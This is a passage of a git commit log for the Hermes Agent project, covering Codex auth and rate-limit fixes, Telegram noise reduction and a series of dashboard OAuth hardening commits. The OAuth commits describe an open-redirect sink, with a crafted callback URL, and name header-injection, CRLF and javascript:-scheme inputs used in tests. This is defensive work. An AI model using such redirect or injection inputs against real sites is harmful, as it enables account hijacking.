gateway surfaced as 'Primary provider auth failed: No Codex credentials
stored. Run hermes auth', prompting re-auth that cannot lift a quota cap.

Classify 429 distinctly (codex_rate_limited, relogin_required=False) with a
non-alarming quota message that honors Retry-After, log it as
'Primary provider rate-limited (429)', and stop format_auth_error from
appending the re-authenticate remediation. Also log the fallback provider's
literal config key instead of the resolved runtime category.

Refs #32790
2026-05-27 03:13:15 -07:00
konsisumer 2bbd53493d fix(cli): sync credential_pool on Codex re-auth
Codex re-auth via `hermes setup` / `hermes model` wrote fresh OAuth
tokens to providers.openai-codex.tokens but left the credential_pool
device_code entry holding the consumed refresh token and stale error
markers. Since the runtime selects from the pool, the next request
spent a dead token and got a 401 token_invalidated. Update the
singleton-seeded pool entries in lockstep and clear their error state.

Fixes #33000
2026-05-27 03:02:06 -07:00
Teknium 4feb181eb4 chore(release): map sir-ad + rdasilva1016-ui in AUTHOR_MAP 2026-05-27 02:41:24 -07:00
Teknium 2f7ba51b80 refactor(gateway): drop try/except wrappers around resolve_display_setting
The two new display-resolution sites added by #31034 (busy_ack_detail
and long_running_notifications) wrapped resolve_display_setting() in
try/except Exception. The existing 4 call sites in this file don't —
the function is safe by contract. Match the established pattern and
drop the redundant guards. -16 LOC, no behaviour change.
2026-05-27 02:41:24 -07:00
houenyang-momo 60f84c6c28 gateway: quiet Telegram operational chatter 2026-05-27 02:41:24 -07:00
Robert DaSilva efa952531b fix: ignore Telegram start pings 2026-05-27 02:41:24 -07:00
sir-ad 8807b1c727 fix(gateway): hide telegram compaction status noise 2026-05-27 02:41:24 -07:00
Teknium 581b0215a5 chore(release): map chaconne67 noreply for #31629 salvage 2026-05-27 02:40:03 -07:00
chaconne67 9c69204d87 fix(codex_responses_adapter): drop foreign-issuer reasoning on replay
reasoning.encrypted_content is sealed to the Responses endpoint that
minted it. When a session switches model providers mid-conversation —
say the user runs /model gpt-5.5 after several turns on grok-4.3, or
vice versa — the persisted codex_reasoning_items carry blobs the new
endpoint cannot decrypt, and every subsequent turn fails with HTTP 400
invalid_encrypted_content.

This is the cross-issuer prevention layer. Pairs with:
* PR #33035 — runtime recovery when the HTTP 400 fires anyway
* PR #33146 — prevention for transient rs_tmp_* items

Stamps each reasoning item with the issuer kind that minted it
(codex_backend / xai_responses / github_responses / other:<url>) at
normalize time, then drops items at replay time when the active
endpoint differs from the stamp. Unstamped (legacy) items pass
through for backwards compatibility.

Cherry-picked from @chaconne67's PR #31629. Conflict against current
main (#33035's replay_encrypted_reasoning parameter) resolved as
'keep both' — the two guards compose: replay_encrypted_reasoning=False
is the session-wide kill switch, current_issuer_kind is the per-item
filter that runs only when replay is still enabled.
2026-05-27 02:40:03 -07:00
Teknium c819bc575b chore(release): map kpadilha noreply for #11038 salvage 2026-05-27 02:25:59 -07:00
Krishna b1a46b3047 fix(codex): drop transient rs_tmp reasoning replay state 2026-05-27 02:25:59 -07:00
Teknium 187cf0f257 tools(terminal): nudge homebrewed CI pollers at the tool surface (#33142)
Background processes whose command contains `gh pr view --json
statusCheckRollup` or `gh pr checks | jq` now get a runtime hint in
the result pointing at the canonical green-ci-policy snippets. The
homebrew shape has caused at least seven silent CI-watcher failures
in the past two weeks (#31329, #31448, #31695, #31709, #31745,
#32264, #33131) — each one a different jq/awk/grep variation of the
same fundamental problem (stdout buffering, jq null-key edge cases,
conclusion-vs-status confusion, TTY-only banner grepping).

The skill that documents this anti-pattern is excellent, but a skill
only fires if the agent loads it. The tool surface fires on every
misuse. This is the embed-footguns-in-tool-surface pattern from
PR #31289 applied to a recurring failure mode that's outgrown
skill-only enforcement.

Detector is deliberately narrow — flags two specific shapes:

  1. Any command containing `statusCheckRollup` (the JSON-API path —
     conclusion vs status field semantics keep burning us).
  2. `gh pr view` / `gh pr checks` combined with `jq` (gh pr
     checks doesn't emit JSON, so any `| jq` here is confused intent;
     the canonical column-2 poller uses awk-on-tabs, not jq).

Does NOT flag the blessed column-2 awk-on-tabs poller (which uses
`awk -F"\t" "\==\"pending\""`) or the exit-code-driven
`gh pr checks $PR >/dev/null` snippet.

Hint composes with the existing background-without-notify_on_complete
hint — both can fire on the same call. Each is independently
actionable.

Tests:
- 4 new cases in tests/tools/test_notify_on_complete.py
- test_homebrew_ci_poller_via_statusCheckRollup_emits_hint (positive)
- test_homebrew_ci_poller_via_gh_pr_checks_piped_to_jq_emits_hint (positive)
- test_canonical_column2_awk_poller_does_not_emit_homebrew_hint (negative)
- test_canonical_gh_pr_checks_exit_code_loop_does_not_emit_hint (negative)
- test_non_ci_background_command_does_not_emit_homebrew_hint (negative)
- 30/30 passing (was 26)
2026-05-27 02:22:08 -07:00
Ben a890389b69 feat(dashboard-auth): HERMES_DASHBOARD_PUBLIC_URL / dashboard.public_url override
Operators behind reverse proxies that don't reliably forward
X-Forwarded-Host / X-Forwarded-Proto / X-Forwarded-Prefix (manual
nginx setups, on-prem ingresses, custom-domain Fly deploys with
incomplete proxy chains) had no way to force the absolute base URL
the OAuth callback redirects from. The dashboard would reconstruct
the redirect_uri from request headers, the IDP would echo it back,
and the user would land on the wrong host or wrong path — 404.

Add `dashboard.public_url` to config.yaml with env override
HERMES_DASHBOARD_PUBLIC_URL. When set, it is the complete authority —
scheme + host + optional path prefix (e.g. https://example.com/hermes) —
and becomes the base for the OAuth `redirect_uri`. X-Forwarded-Prefix
is IGNORED on this code path because the operator has explicitly
declared the public URL; we no longer need to guess from proxy
headers, and stacking the prefix on top would double-prefix the
common case where the prefix is already baked into public_url.

When unset, the existing proxy_headers + X-Forwarded-Prefix
reconstruction runs untouched. Existing Fly.io deploys continue to
work without configuration — this is purely additive.

Precedence mirrors dashboard.oauth.client_id:

  env (non-empty) > config.yaml > reconstructed from request

Implementation:

  - hermes_cli/config.py: add dashboard.public_url to DEFAULT_CONFIG
    with a multi-paragraph doc comment explaining the use case,
    the X-Forwarded-Prefix interaction, and the validation rules.
  - hermes_cli/dashboard_auth/prefix.py: factored out the existing
    _REJECT_CHARS frozenset, added _normalise_public_url() validator
    (requires http/https scheme + non-empty host + no header-injection
    chars), _load_dashboard_section() loader (robust to load_config
    raising, non-dict shapes), and resolve_public_url() entry point
    with the env-overrides-config precedence. A malformed value
    silently falls through to ""; the caller treats "" as "reconstruct
    from request" so a typo never breaks the login flow.
  - hermes_cli/dashboard_auth/routes.py: rewrite _redirect_uri()
    docstring to spell out the three resolution tiers; add the
    public_url short-circuit before the existing X-Forwarded-Prefix
    splicing. Source-level comment notes that X-Forwarded-Prefix is
    intentionally ignored when public_url is set so a future reader
    doesn't try to "fix" the missing prefix layering.
  - cli-config.yaml.example: extend the existing dashboard section
    with a public_url block.
  - website/docs/user-guide/features/web-dashboard.md: new "Public
    URL override" section between the provider configuration and
    the OAuth flow walkthrough. Documents the env-vs-config table,
    the validation rules, and the `http://` `public_url` ↔ Secure
    cookie footgun.

Test coverage — new TestPublicUrlOverride class (8 tests):

  - env var overrides request reconstruction (the primary motivating
    case)
  - config.yaml used when env unset
  - env wins over config (precedence pin)
  - public_url with a path prefix already baked in (the Q1-a case the
    user explicitly chose)
  - public_url suppresses X-Forwarded-Prefix layering (defends
    against the double-prefix bug)
  - trailing slash stripped from public_url (no //auth/callback)
  - malformed public_url falls through to reconstruction (six
    hostile inputs: javascript:, ftp:, missing scheme, missing host,
    quote chars, CRLF injection)
  - empty env string doesn't shadow config.yaml entry (CI / Fly
    provisioned-but-empty secret case)

Mutation-tested: flipping the precedence in resolve_public_url() trips
exactly test_env_overrides_config_public_url; weakening the validator
(accept any scheme) trips exactly test_malformed_public_url_falls_through_to_reconstruction.
Both other tests in each pair stay green, confirming the suite
discriminates the specific regression each test pins.
2026-05-27 02:12:27 -07:00
Ben 0af37ff272 style(dashboard-auth): redesign /login page to match Nous design system
The login page is the first surface the user sees on a gated dashboard
and shipped with off-the-shelf system fonts and a generic orange
accent that didn't match the React dashboard waiting on the other
side of the OAuth round trip. Apply the same visual language the SPA
uses (the @nous-research/ui package) so the auth flow feels like one
product, not two.

What changes (visual only — no functional changes):

  Typography
    - Body: Collapse (regular + bold), served from /fonts/ — the same
      woff2 files the dashboard SPA loads via the design-system's
      fonts.css.
    - Display: Rules Compressed (regular + medium) for the brand
      wordmark and the page heading.
    - Brand chrome (heading, buttons, footer) uses the DS idiom:
      uppercase + letter-spacing 0.2em (matching the DS Button class).

  Colour
    - Background: #170d02 (deep brown-black; --background-base in DS).
    - Accent: #ffac02 (amber; --midground in DS).
    - Foreground: #ffffff.
    - Hairlines: color-mix() of the midground at 18% / 35%, mirroring
      the DS "@theme inline" derived tokens.

  Button surface
    - Solid amber surface with dark text, no rounded corners (DS Button
      is squared). Inset bevel —  — directly mirrors the DS
      Button SHADOW_DEFAULT (). :active uses filter:invert(1) which matches the DS
      Button's .

  Atmosphere
    - Subtle 3px dither (repeating-conic-gradient at 4% midground) +
      a midground radial glow at top — same idioms as the DS .dither
      utility and the SPA's panel chrome.
    - slide-up fade-in entrance animation matching DS @keyframes
      slide-up (0.6s ease-out). Honours prefers-reduced-motion.

  Brand wordmark
    - 'NOUS · RESEARCH' above the card in Rules Compressed, amber,
      0.32em tracking. Establishes ownership before the user squints
      at the buttons.

  Empty-state page
    - The 'Sign-in unavailable' fallback (no providers registered)
      got the same colour-token and typography treatment so the
      misconfigured-deploy experience is also coherent.

Fonts are served from /fonts/*.woff2 — a path the dashboard-auth gate
already allowlists pre-auth (see _GATE_PUBLIC_PREFIXES in
middleware.py:42), so the login page renders with the brand typeface
without needing the React bundle loaded. The page is still entirely
static HTML+CSS with no JS — the original constraint (no SPA
dependency, no session token) is preserved.

The class="provider-btn" selector is unchanged — the existing test
suite extracts the anchor href via that class, and a regression that
renamed it would silently break tests/hermes_cli/test_dashboard_auth_401_reauth.py.
A docstring note on the module flags this so future visual tweaks
don't break the contract by accident.

Visual smoke-test: rendered both the happy path (multiple providers
listed) and the empty-state page in a browser and verified all five
DS criteria — brown-black bg, amber accent, uppercase wide-tracking
type, inset-bevel buttons, Nous · Research wordmark — render
correctly with no unstyled fallbacks. 208/208 dashboard-auth tests
remain green.
2026-05-27 02:12:27 -07:00
Ben 61dcc33893 feat(dashboard-auth): config.yaml as canonical surface for dashboard.oauth
Per AGENTS.md, ~/.hermes/.env is reserved for API keys / secrets and
config.yaml is the surface for non-secret configuration. The Nous
Portal plugin previously read HERMES_DASHBOARD_OAUTH_CLIENT_ID and
HERMES_DASHBOARD_PORTAL_URL from the environment only, which forced
local-dev / on-prem operators to put non-secret per-instance
configuration in .env — violating the convention.

Add dashboard.oauth.{client_id,portal_url} to DEFAULT_CONFIG and have
the plugin resolve each setting with env-overrides-config precedence:

  1. Env var when set to a non-empty value (Fly.io platform-secret
     injection — what pushes per-deploy client_ids without baking
     them into the image).
  2. config.yaml entry (canonical surface for local dev / on-prem).
  3. Plugin default (no provider registered when client_id is empty;
     portal_url defaults to https://portal.nousresearch.com).

Empty env values are explicitly treated as unset so a provisioned-but-
not-populated Fly secret can't accidentally shadow a valid config.yaml
entry with an empty string — operators would otherwise lose the gate.

Implementation:

  - hermes_cli/config.py: add dashboard.oauth.{client_id,portal_url}
    block to DEFAULT_CONFIG with full doc comment explaining the
    override precedence and Fly.io rationale.
  - plugins/dashboard_auth/nous/__init__.py: add _load_config_oauth_section,
    _resolve_client_id, _resolve_portal_url helpers; replace the two
    direct os.environ.get() calls in register() with the resolvers.
    Update the skip-reason string to mention BOTH surfaces so an
    operator looking at the fail-closed bind error knows config.yaml
    is a valid alternative to the env var.
  - plugins/dashboard_auth/nous/plugin.yaml: update description to
    name both surfaces. requires_env stays pointing at the env var
    name — it's metadata-only (not used by the plugin loader for
    gating) so this is documentation/UX, not enforcement.
  - cli-config.yaml.example: append commented dashboard.oauth block
    with the same override rationale operators see in code.
  - website/docs/user-guide/features/web-dashboard.md: rewrite the
    'Default provider: Nous Research' section to lead with config.yaml,
    present env vars as operator overrides (Fly.io's primary path).
    Updated the example fail-closed bind error to match the new
    skip-reason text.

Test coverage — new TestConfigYamlSource class (8 tests) pinning
every tier of the precedence chain:

  - config-yaml-only path registers correctly
  - both config-yaml fields (client_id + portal_url) honoured
  - env var overrides config for client_id (Fly.io critical path)
  - env var overrides config for portal_url
  - empty env string does NOT shadow config (CI/Fly edge case)
  - neither source set → skip with reason mentioning BOTH surfaces
  - load_config() raising falls through to env-only path (resilience)
  - non-dict oauth section falls through cleanly (typo resilience)

Mutation-tested: flipping the precedence to config-wins-over-env trips
exactly test_env_overrides_config_client_id while the other 7 stay
green, confirming the suite discriminates the order, not just the
sources.

This closes the last item in Teknium's PR review (PR #30156).
2026-05-27 02:12:27 -07:00
Ben e2a92ce649 chore: gitignore .hermes/ working directory; drop tracked plan artifact
The 4533-line dashboard-OAuth plan was checked into .hermes/plans/
during initial development. .hermes/ is the Hermes Agent's runtime
working directory (logs, session caches, in-flight plans) — its
contents are never artifacts of the codebase and should not have been
tracked.

Add .hermes/ to .gitignore so future agent runs that materialise
plans/audits/cache files in the working tree don't accidentally stage
them. Remove the existing plan file from version control.

The plan content is preserved in the branch history if anyone needs to
reference it.
2026-05-27 02:12:27 -07:00
Ben b26d81d536 feat(dashboard-auth): honour X-Forwarded-Prefix + __Host-/__Secure- cookies
Mission-control style deploys reverse-proxy the dashboard at a path
prefix (e.g. mission-control.tilos.com/hermes/* -> :9119) and inject
X-Forwarded-Prefix: /hermes on every request. The SPA mount already
honoured this for asset URLs and the bootstrap __HERMES_BASE_PATH__,
but the OAuth gate didn't:

  1. The gate's Location: header to /login and the 401 envelope's
     login_url were built bare ("/login?next=..."). Under a /hermes
     prefix the browser follows that to mission-control.tilos.com/login
     which the proxy doesn't route to the dashboard.
  2. _redirect_uri (the OAuth callback URL handed to the IDP) used
     request.url_for() which doesn't honour X-Forwarded-Prefix
     (Starlette/uvicorn only proxy_headers Host + Proto + For). The
     IDP redirects back to /auth/callback instead of /hermes/auth/
     callback → 404 in the user's browser.
  3. Cookies were set with Path=/ which leaks them to other apps on
     the same origin and won't be sent back on requests under the
     prefix in the first place.

Fix threads the normalised prefix through every boundary:

  * New hermes_cli/dashboard_auth/prefix.py — single source of truth
    for X-Forwarded-Prefix parsing. web_server._normalise_prefix
    becomes a re-export so the SPA mount, the gate, and the cookies
    helper all agree.
  * middleware._unauth_response builds login_url = f"{prefix}/login".
  * routes._redirect_uri splices the prefix into the path component
    of the IDP-bound URL (with full validation of the header).
  * cookies.{set,clear}_{session,pkce}_cookie now take prefix="".
    Path attribute switches to /hermes when set; cookie name switches
    name variant (see below). Every caller passes the request's
    normalised prefix.

Cookie hardening (Teknium's lesser-note #1 in the PR review): adopt
the __Host- / __Secure- cookie name prefixes per draft-west-cookie-
prefixes. The variant is selected from (use_https, prefix):

  * Loopback HTTP → bare "hermes_session_at" (both prefixes require
    Secure, incompatible with HTTP).
  * HTTPS, direct deploy (Path=/) → "__Host-hermes_session_at".
    Strongest spec: bound to exact origin, no Domain attribute, Secure
    required.
  * HTTPS, behind a proxy prefix (Path=/hermes) →
    "__Secure-hermes_session_at". __Host- forbids Path != "/"; the
    explicit Path=/hermes covers same-origin app isolation.

Setter and reader BOTH consult the prefix because the cookie *name*
changes — a reader that looked up the bare name when the setter wrote
__Secure- would never find the value. The reader falls back across
all three variants so a request whose shape changed mid-session (e.g.
post-deploy from no-prefix to /hermes) still picks up the existing
cookie until it expires.

Test coverage:

  - tests/hermes_cli/test_dashboard_auth_prefix.py — new file. 11 tests
    pinning:
      • Location: /hermes/login on the gate's HTML redirect
      • 401 envelope login_url carries the prefix
      • Malformed X-Forwarded-Prefix is ignored (header-injection
        defence; the script-tag value is normalised to empty string)
      • _redirect_uri splices /hermes into the path (the property
        that prevents the IDP-returns-to-404 failure)
      • PKCE cookie uses Path=/hermes + __Secure- when proxied
      • Session cookies use __Host- when direct, __Secure- when
        proxied, bare on loopback HTTP
      • End-to-end round trip with hand-managed PKCE cookie carriage
        (TestClient can't simulate a Path=/hermes cookie automatically)
  - tests/hermes_cli/test_dashboard_auth_cookies.py — rewritten to pin
    each (use_https, prefix) shape produces its expected cookie name,
    plus reader-side coverage that __Host- and __Secure- variants are
    both recognised.
  - Existing tests across middleware / 401-reauth / etc. updated to
    match the new cookie names (substring contains instead of
    startswith).

Mutation-tested: reverting _unauth_response to build the bare
"/login" URL trips exactly the two tests that pin the prefix
carriage, confirming the suite discriminates the regression.
2026-05-27 02:12:27 -07:00
Ben 034ad95fed fix(dashboard-auth): propagate next= through login page + PKCE cookie
The gate's _unauth_response set next=<path> on the /login redirect URL,
but nothing downstream read it: render_login_html ignored next=,
auth_login dropped it, and auth_callback read next= from its own query
string — which an IDP never sets on the callback URL (real IDPs only
echo back code+state). The _validate_post_login_target plumbing in the
callback was unreachable on the happy path, so users always landed on
"/" regardless of what they originally requested.

Worse: reading next= from the callback URL was a latent open-redirect
sink, since an attacker could craft /auth/callback?...&next=/admin and
have the server honour it post-auth.

Fix carries next= through the round trip on a server-controlled channel:

  1. login_page reads request.query_params['next'] and passes it (post-
     validation) to render_login_html.
  2. render_login_html threads next= URL-encoded into each provider
     button's href, with HTML-attribute escaping as defence in depth.
  3. auth_login accepts ?next= as a query param, re-validates, and
     appends it as a fourth segment (next=<urlquoted>) in the PKCE
     cookie payload alongside provider/state/verifier.
  4. auth_callback no longer accepts a next: str = "" query param. It
     parses next= out of the PKCE cookie and validates that with the
     same same-origin rules. Any attacker-supplied ?next= on the
     callback URL is silently ignored — server-only carrier.

Test coverage adds three classes:

  - TestAuthCallbackNext drives /login → /auth/login → IDP-bounce →
    /auth/callback end-to-end without smuggling next= onto the callback
    URL (which is what the previous tests did and why they didn't
    catch the bug). Includes test_attacker_callback_next_param_is_ignored
    to pin the security property that the URL value is never read.
  - TestRenderLoginHtmlNext covers the rendering function at the
    unit boundary so a regression that drops next_path is caught
    without spinning up the full app.
  - TestAuthLoginPkceCookieNext inspects the Set-Cookie header on
    /auth/login responses so a regression in cookie encoding is caught
    without driving the full round trip.

Mutation-tested: reverting auth_callback to read next= from the URL
trips 3 of 6 TestAuthCallbackNext tests (the safe-path and attacker-
hardening ones), confirming the suite discriminates between the cookie
read and the URL read.
2026-05-27 02:12:27 -07:00
Ben c3104195b8 fix(dashboard-auth): bypass loopback WS peer check in gated mode
When the OAuth gate is active, start_server runs uvicorn with
proxy_headers=True so the dashboard can honour X-Forwarded-Proto from
Fly's TLS terminator (cookies, redirect URI reconstruction). A side
effect: ws.client.host is rewritten to the X-Forwarded-For value, which
on Fly is the real internet client IP — never loopback. The loopback
peer guard in _ws_client_is_allowed then rejected every WS upgrade in
gated mode (4403 close) even after a successful OAuth round trip and
ticket consumption, silently breaking /api/pty, /api/ws, /api/pub, and
/api/events.

Fix: in gated mode, bypass the peer-IP check. The OAuth gate +
single-use ticket is the auth. The Host/Origin guard in
_ws_host_origin_is_allowed still runs and is what protects against
DNS-rebinding here, not the peer IP.

Loopback mode behaviour is unchanged: the legacy ?token= path is the
only auth there and we don't want LAN hosts guessing tokens.

Regression coverage: TestWsRequestIsAllowedGated pins all four
behaviours — non-loopback peer allowed in gated mode, non-loopback peer
rejected in loopback mode, loopback peer allowed in loopback mode, and
the Host/Origin guard still firing on a rebinding attempt with gated
mode + matching peer.
2026-05-27 02:12:27 -07:00
Ben 866cc988b5 fix(dashboard-auth): use fixed-length sig suffix in stub token framing
The stub auth provider's _sign/_unsign helpers joined payload and HMAC
with a 'b"."' separator and recovered the parts via bytes.rsplit. HMAC-SHA256
digests are random bytes, so ~12% of the time the digest contains 0x2E
('.') and rsplit picks the wrong split point -- HMAC verification then
spuriously rejects valid tokens.

test_stub_refresh_round_trips was failing ~25% of the time in isolation
because of this.

Switch to a fixed-length suffix (32 bytes, sliced off in _unsign): no
separator means no collision class. After the fix, 10/10 runs pass.
2026-05-27 02:12:27 -07:00
Ben c598076b76 test(dashboard-auth): strip HERMES_DASHBOARD_OAUTH_* env vars in hermetic fixture
When these vars are set in the developer's shell, every /api/status call
triggers load_gateway_config() -> discover_plugins() -> the bundled
dashboard_auth/nous plugin auto-registers itself, leaking a provider into
the registry across tests on the same xdist worker. That breaks assertions
like 'auth_providers == []' (loopback) and '== ["stub"]' (gated) in
test_dashboard_auth_status_endpoint.py.

CI never has these set, so this only surfaced locally -- exactly the
hermeticity gap _hermetic_environment is meant to close. Add them to
_HERMES_BEHAVIORAL_VARS so the autouse fixture strips them, and to the
unset list in scripts/run_tests.sh as belt-and-suspenders for direct
pytest invocations.
2026-05-27 02:12:27 -07:00
Ben a498485631 feat(dashboard-auth-nous): surface token iss/aud in verification-failure error
When jwt.decode raises InvalidTokenError, decode the token a second time
without signature verification (safe — we never trust the values, just
display them) and append the actual iss/aud claims plus our configured
expected values to the error message. Lets operators see config drift
between HERMES_DASHBOARD_PORTAL_URL / HERMES_DASHBOARD_OAUTH_CLIENT_ID
and what Portal is actually emitting without having to hand-decode the
JWT from the browser cookie.
2026-05-27 02:12:27 -07:00
Ben 42729775db fix(dashboard): trigger plugin discovery in cmd_dashboard before start_server
The argparse-setup plugin discovery path is gated on
_plugin_cli_discovery_needed(), which returns False for any built-in
subcommand including 'dashboard' (to save ~500ms startup on hot paths
like --tui). As a result, plugins/dashboard_auth/nous never registered
its DashboardAuthProvider, and start_server's fail-closed gate check
tripped for any non-loopback bind even when the Nous provider was
bundled and ready to run.

Call discover_plugins() explicitly in cmd_dashboard so the provider
registry is populated before the gate check runs. discover_plugins() is
idempotent (per its docstring), so this is safe to call regardless of
whether the argparse path already ran it.
2026-05-27 02:12:27 -07:00
Ben b3dc539304 feat(dashboard-auth): Nous plugin always-on; default portal URL; specific error messages
The Nous OAuth provider plugin (plugins/dashboard_auth/nous) is bundled
and auto-loaded — same as before — but previously refused to register
unless BOTH HERMES_DASHBOARD_OAUTH_CLIENT_ID and HERMES_DASHBOARD_PORTAL_URL
were set, then the gate's fail-closed branch told the operator 'install
the default Nous provider'. That message is misleading: the provider IS
installed; it's just unconfigured. And the contract only really needs
the per-instance client_id — the portal URL is the same for everyone
in production.

Three changes:

1. plugins/dashboard_auth/nous/__init__.py:
   - HERMES_DASHBOARD_PORTAL_URL is now optional and defaults to
     'https://portal.nousresearch.com'. Override only for staging
     (portal.rewbs.uk) or a custom deployment. Empty string also
     falls back to the default so an empty Fly secret can't point
     the dashboard at nowhere.
   - Plugin exposes a module-level LAST_SKIP_REASON: str that the gate
     reads when no providers register. Cleared on each register() call.
     Skip reasons are human-readable and actionable
     ('HERMES_DASHBOARD_OAUTH_CLIENT_ID is not set. The Nous Portal
     provisions this env var…').

2. plugins/dashboard_auth/nous/plugin.yaml:
   - requires_env drops HERMES_DASHBOARD_PORTAL_URL; only the client_id
     is mandatory. Description updated to reflect this.

3. hermes_cli/web_server.py:
   - When the gate fail-closes for 'no providers', it now reads each
     bundled plugin's LAST_SKIP_REASON and embeds them in the SystemExit
     message. Operator sees the specific config fix needed:
       Bundled providers reported these issues:
         • nous: HERMES_DASHBOARD_OAUTH_CLIENT_ID is not set. …
     instead of the prior generic 'Install the default Nous provider'.

Tests:
  - TestPluginRegister rewritten to assert the new defaults +
    LAST_SKIP_REASON contents (6 tests, +1 new for empty-string env).
  - New gate test test_start_server_surfaces_nous_skip_reason_when_unconfigured.
  - test_get_method_is_not_allowed widened to handle the SPA-shell 200
    path explicitly — assertion now verifies no JSON ticket leaks
    rather than asserting a specific status code (covers all four of
    401/404/405/200).

Docs updated: web-dashboard.md's 'Default provider' section now shows
the env-var table with required/optional columns and embeds the
fail-closed error message verbatim so operators can match what they
see at the prompt.
2026-05-27 02:12:27 -07:00
Ben af3d4a687f fix(dashboard-auth): ChatPage cleanup closes WS via wsRef.current
Phase 5.3 (1c99c2f5e) wrapped the WS construction in an IIFE so the
gated-mode ticket fetch could resolve asynchronously, but the effect's
top-level cleanup still referenced the IIFE-scoped `const ws`. TypeScript
catches it at build time:

  src/pages/ChatPage.tsx:654:7 - error TS2304: Cannot find name 'ws'.

LSP-cache-lag drowned the diagnostic under the JSX-types-missing noise
locally, so the bug shipped uncaught. Switch to `wsRef.current?.close()`
which:

  - resolves to the same WebSocket the IIFE assigned (line 562:
    `wsRef.current = ws`)
  - is null-safe when unmount races the ticket fetch (the IIFE early-
    returns on `unmounting` so wsRef.current is never set)

The ChatSidebar.tsx + gatewayClient.ts cleanup paths were already using
this pattern correctly (`ws?.close()` / `ws` was hoisted), so this fix
is ChatPage-only.
2026-05-27 02:12:27 -07:00
Ben 7c9cdbc093 docs(dashboard-auth): Phase 7 — OAuth Authentication section in web-dashboard.md
Adds an 'OAuth Authentication (gated mode)' section to the existing web
dashboard docs, slotted just before the CORS section so readers
encounter it after the REST API reference. Covers:

  - When the gate engages (decision table for --host / --insecure
    combinations).
  - Fail-closed semantics if no provider is registered.
  - Bundled Nous provider, env-var contract, Portal provisioning.
  - Full OAuth dance (link to nous-account-service contract doc) — auth
    code + PKCE S256, JWKS verification, 15-min token TTL, no refresh
    token in V1.
  - Cookies set (hermes_session_at + hermes_session_pkce; mentions the
    deprecated hermes_session_rt slot).
  - Logout flow, audit log path, redacted fields.
  - Custom provider plugin recipe with the DashboardAuthProvider ABC.
  - Verification recipe: env vars + /api/status curl.

The docs follow the existing web-dashboard.md style (option tables,
ASCII flow diagrams, curl examples). No frontmatter/sidebar position
changes — the section is appended in place.
2026-05-27 02:12:27 -07:00
Ben 2fc4615fc4 feat(dashboard-auth): Phase 7 — SPA AuthWidget + /api/status auth fields
Phase 7 surfaces the OAuth gate state to users.

web/src/components/AuthWidget.tsx (new):
  Sidebar widget that fetches /api/auth/me on mount and renders a
  compact 'Logged in as <user_id…> via <provider>' row with a logout
  icon. Contract V1 (Nous Portal) emits no email/display_name claims,
  so user_id is the display value (truncated to 14 chars + ellipsis);
  display_name and email fallthroughs are forward-compat for OQ-C1.
  Renders nothing on 401 from /api/auth/me — that's the signal the
  gate isn't engaged (loopback mode), in which case the widget would
  be confusing.
  Logout POSTs /auth/logout (which clears cookies + redirects to
  /login) then full-page-navigates to /login itself; the SPA's fetch
  wrapper doesn't follow that redirect, so the navigation is explicit.

web/src/App.tsx: mounts <AuthWidget /> above <SidebarFooter />.
  Component is self-hiding in loopback mode so there's no need for a
  conditional mount.

web/src/lib/api.ts:
  - getAuthMe() + logout() helpers
  - AuthMeResponse type
  - StatusResponse gets optional auth_required + auth_providers fields
    so the existing StatusPage can render a gated/loopback badge.

hermes_cli/web_server.py: /api/status payload now includes
  - auth_required: bool — whether app.state.auth_required is True
  - auth_providers: list[str] — registered DashboardAuthProvider names
  Lazy-imports list_providers so early-startup status calls don't
  crash if the dashboard_auth module is still being set up.

tests/hermes_cli/test_dashboard_auth_status_endpoint.py: 3 new tests
covering the new status fields in both gated and loopback modes plus
a regression that no existing field got dropped from the payload.

The hermes status CLI is unchanged in this commit — that command
tracks model providers + OAuth credentials, not running-dashboard
state. The /api/status endpoint is the canonical place to query
dashboard auth-gate state, consumed by the React StatusPage already.
2026-05-27 02:12:27 -07:00
Ben 5e9308b5b8 feat(dashboard-auth): Phase 6 — 401 re-auth envelope + next= propagation
Contract V1 of nous-account-service PR #180 ships no refresh tokens, so
the original Phase 6 silent-refresh design is replaced with a thinner
'401 → redirect to /login' UX. The dashboard's gated middleware now
emits a structured envelope on any auth failure; the SPA's fetch
wrapper sees it and full-page-navigates the user through re-auth.

hermes_cli/dashboard_auth/cookies.py:
  set_session_cookies(refresh_token='') SKIPS writing the
  hermes_session_rt cookie. Forward-compat: a non-empty refresh_token
  still emits the cookie unchanged, so a future Portal contract that
  starts issuing RTs flips the persistence on with no other change.
  clear_session_cookies still emits a Max-Age=0 deletion for the RT
  cookie so stale cookies from earlier deployments get flushed on
  logout / session expiry. Deprecation marker + rationale in
  module docstring per the user's docstring-only deprecation pattern.

hermes_cli/dashboard_auth/middleware.py:
  _unauth_response now builds a structured JSON envelope for API 401s:
    { error: 'session_expired' | 'unauthenticated',
      detail: 'Unauthorized',
      reason: <internal>,
      login_url: '/login?next=<safe-path>' }
  HTML redirects also carry next= so a user landing on /sessions
  without a cookie bounces back to /sessions after re-auth.
  _safe_next_target validates same-origin: drops protocol-relative
  paths (//evil.com), absolute URLs, and any /login or /auth/* loop.
  Dead cookies are cleared on the 401 path so the browser stops
  replaying invalid tokens.

hermes_cli/dashboard_auth/routes.py:
  /auth/callback accepts next= query param and validates via
  _validate_post_login_target (same rules as the gate's
  _safe_next_target — defence-in-depth because next= survived a full
  IDP round trip and attacker-controlled state can re-enter via the
  callback URL). Open-redirect attempts land at '/' instead.

web/src/lib/api.ts:
  fetchJSON parses the 401 envelope and full-page-navigates to
  body.login_url ONLY on the known session-expiry error codes.
  Domain-level 401s (e.g. permission errors) bubble up as regular
  errors. credentials: 'include' added so cookie auth works for all
  fetches routed through this wrapper. sessionStorage.lastLocation is
  preserved for future use by AuthWidget / hermes_status.

Test files marked with pytest.mark.xdist_group so the four files that
mutate web_server.app.state.auth_required serialize onto the same xdist
worker — eliminates 'works locally, fails in CI' app-state bleed.

20 new tests in test_dashboard_auth_401_reauth.py:
  - set_session_cookies(refresh_token='') skips RT cookie
  - clear_session_cookies still emits RT deletion
  - 401 envelope shape (unauthenticated vs session_expired)
  - dead cookie cleared on invalid-token 401
  - login_url carries next= for deep paths
  - login loop avoided when path is /login/auth/api-auth
  - protocol-relative URL rejected
  - _safe_next_target unit tests (accept same-origin, reject loops/abs)
  - /auth/callback respects safe next= but rejects open redirects

2 pre-existing tests updated to accept the new /login?next=%2F shape.

Full dashboard-auth suite: 168 passed, 1 skipped (Phase 0 pre-existing).
2026-05-27 02:12:27 -07:00
Ben 8971e94831 feat(dashboard-auth): SPA WS auth — getWsTicket() + buildWsAuthParam()
Phase 5 task 5.3. The dashboard's three WS-using surfaces (ChatPage,
